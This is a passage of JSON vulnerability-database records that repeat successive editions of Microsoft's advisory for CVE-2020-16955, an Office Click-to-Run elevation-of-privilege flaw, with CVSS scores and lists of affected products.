"kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T16:51:10", "differentElements": ["msAffectedSoftware"], "edition": 10}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-05T06:46:26", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-05T06:46:26", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-05T06:46:26", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T06:46:26", "differentElements": ["msAffectedSoftware"], "edition": 11}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-05T08:49:01", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-05T08:49:01", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-05T08:49:01", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T08:49:01", "differentElements": ["msAffectedSoftware"], "edition": 12}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-05T18:46:06", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-05T18:46:06", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-05T18:46:06", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T18:46:06", "differentElements": ["msAffectedSoftware"], "edition": 13}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-05T20:48:18", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-05T20:48:18", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-05T20:48:18", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T20:48:18", "differentElements": ["msAffectedSoftware"], "edition": 14}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-06T10:43:20", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-06T10:43:20", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-06T10:43:20", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T10:43:20", "differentElements": ["msAffectedSoftware"], "edition": 15}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-06T12:49:32", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-06T12:49:32", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-06T12:49:32", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T12:49:32", "differentElements": ["msAffectedSoftware"], "edition": 16}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-06T16:54:01", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-06T16:54:01", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-06T16:54:01", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T16:54:01", "differentElements": ["msAffectedSoftware"], "edition": 17}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-06T18:44:58", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-06T18:44:58", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-06T18:44:58", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 